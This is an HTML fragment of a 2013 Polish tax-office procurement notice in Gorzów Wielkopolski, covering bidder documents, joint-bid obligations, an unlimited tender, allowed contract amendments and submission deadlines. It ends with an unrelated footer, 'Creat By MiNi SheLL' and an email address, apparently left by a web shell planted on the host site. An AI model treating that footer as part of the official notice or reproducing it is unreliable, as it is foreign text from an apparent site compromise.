<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Wykonawca winien również złożyć następujące dokumenty: a)wypełniony i podpisany formularz oferty (Rozdział III SIWZ) wraz z załącznikami, b)pełnomocnictwo do reprezentowania Wykonawcy, jeżeli nie wynika ono z innych złożonych dokumentów, c)Wykonawca należący do grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 roku o ochronie konkurencji i konsumentów (Dz.U. Nr 50, poz. 331 z późn. zm.) załącza do oferty listę podmiotów należących do tej samej grupy kapitałowej oraz określi powiązania istniejące między podmiotami. d)Wykonawca nie należący do grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 roku o ochronie konkurencji i konsumentów (Dz.U. Nr 50, poz. 331 z późn. zm.), składa informację o tym, że nie należy do grupy kapitałowej, e)informacja o dysponowaniu zasobami innych podmiotów wraz z określeniem zakresu oraz dowodami, iż Wykonawca będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności pisemnym zobowiązaniem tych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich, przy wykonywaniu zamówienia. 2.Oświadczenie podmiotów występujących wspólnie, w którym Wykonawcy zobowiązują się m.in. do: a)solidarnej odpowiedzialności wszystkich podmiotów w razie nie wykonania lub nienależytego wykonania przedmiotu zamówienia, b)nie rozwiązywania umowy przez któregokolwiek z Wykonawców, przed wykonaniem zobowiązań wynikających z umowy, c)ustanowienia pełnomocnika do reprezentowania Wykonawców w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego, z określeniem zakresu pełnomocnictwa. Pełnomocnictwo może być udzielone: - łącznie przez wszystkich Wykonawców (jeden dokument),- oddzielnie przez każdego Wykonawcę (tyle dokumentów ilu Wykonawców). Przyjmuje się, że pełnomocnictwo do podpisywania oferty obejmuje pełnomocnictwo do poświadczania za zgodność z oryginałem wszystkich dokumentów. Pełnomocnictwo musi wynikać z załączonych do oferty dokumentów oraz mieć formę pisemną. Wszelka korespondencja prowadzona będzie z Pełnomocnikiem, jeżeli załączone pełnomocnictwo nie będzie wskazywało inaczej. d)niedokonywania zmian w umowie bez zgody Zamawiającego, e)przedstawienia podziału przedmiotu zamówienia na poszczególnych Wykonawców. Wykonawcy składający ofertę wspólnie winni wskazać Wykonawcę, na konto którego będą przekazywane należności z tytułu realizacji przedmiotu zamówienia.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający dopuszcza zmianę postanowień umowy oraz określa warunki zmiany: 1) zmianę wartości wynagrodzenia w przypadku zmiany stawki podatku od towarów i usług VAT na przedmiot zamówienia. Zmiana wartości wynagrodzenia winna być wyliczona następująco: a)w przypadku jednakowej zmiany stawki podatku od towarów i usług VAT na wszystkie artykuły przedmiotu zamówienia - kwota wynagrodzenia netto pozostała do wykorzystania w chwili zmiany przepisów o podatku od towarów i usług VAT winna być odpowiednio powiększona lub zmniejszona o zmienioną stawkę podatku od towarów i usług VAT, b)w przypadku zmiany na różne stawki podatku od towarów i usług VAT - nowe ceny jednostkowe brutto artykułów przedmiotu zamówienia oraz ceny jednostkowe brutto nie zmienione zostaną przemnożone przez niewykorzystaną ilość danego asortymentu, następnie uzyskane wartości brutto zostaną zsumowane. Otrzymane w powyższy sposób wynagrodzenie, po zsumowaniu z dotychczas wydatkowaną kwotą na zakup przedmiotu zamówienia, stanowić będzie wynagrodzenie z tytułu realizacji przedmiotu zamówienia. 2)w związku ze zmianami w strukturze organizacyjnej Wykonawcy lub Zamawiającego, dopuszcza się zmiany dotyczące określonych w umowie nazw, adresów. Strony niezwłocznie poinformują się pisemnie o tych zmianach. 3)zmiany osób reprezentujących Strony. Strony niezwłocznie poinformują się pisemnie o tych zmianach. 4)zmiany organizacyjne u Zamawiającego , w wyniku których w miejsce Zamawiającego wstępuje Izba Skarbowa lub inna jednostka organizacyjna Skarbu Państwa. Zamawiający poinformuje Wykonawcę pisemnie o tych zmianach. 2.Zmiany do umowy, o których mowa w pkt 1 ppkt 1, 4 muszą być wprowadzone w formie pisemnej.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.usgorzow.mf.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Skarbowy, ul. Jagiellończyka 10, 66-400 Gorzów Wlkp. (pok. 318).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.06.2013 godzina 08:30, miejsce: Urząd Skarbowy, ul. Jagiellończyka 10, 66-400 Gorzów Wlkp. (pok. 318).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com